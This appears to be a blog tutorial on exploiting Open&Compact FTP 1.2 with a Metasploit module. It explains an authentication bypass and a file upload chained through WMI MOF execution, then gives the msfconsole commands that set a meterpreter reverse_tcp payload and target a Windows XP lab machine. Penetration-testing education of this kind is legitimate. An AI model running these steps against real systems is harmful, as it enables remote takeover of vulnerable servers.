This
module exploits multiple vulnerabilities found in Open Compact FTP server. The
software contains authentication bypass vulnerability and a arbitrary file
upload vulnerability that allows a remote attacker to write arbitrary files to
the file system as long as there is at least one user who has permission. Code
execution can be achieved by first uploading the payload to the remote machine
as an exe file, and then upload another mof file, which enables WMI (Management
Instrumentation service) to execute the uploaded payload. Please note that this
module currently only works for Windows before Vista.
Exploit
Targets
Open&Compact
FTP 1.2
Requirement
Attacker: Kali Linux
Victim PC: Windows XP SP 3
Open
Kali Linux terminal type msfconsole
Now
type use
exploit/windows/ftp/open_ftpd_wbem
msf
exploit (open_ftpd_wbem)>set payload windows/meterpreter/reverse_tcp
msf
exploit (open_ftpd_wbem)>set lhost 192.168.1.137 (IP of
Local Host)
msf
exploit (open_ftpd_wbem)>set rhost 192.168.1.129 (IP of Victim
PC)
msf
exploit (open_ftpd_wbem)>exploit
0 comments:
Post a Comment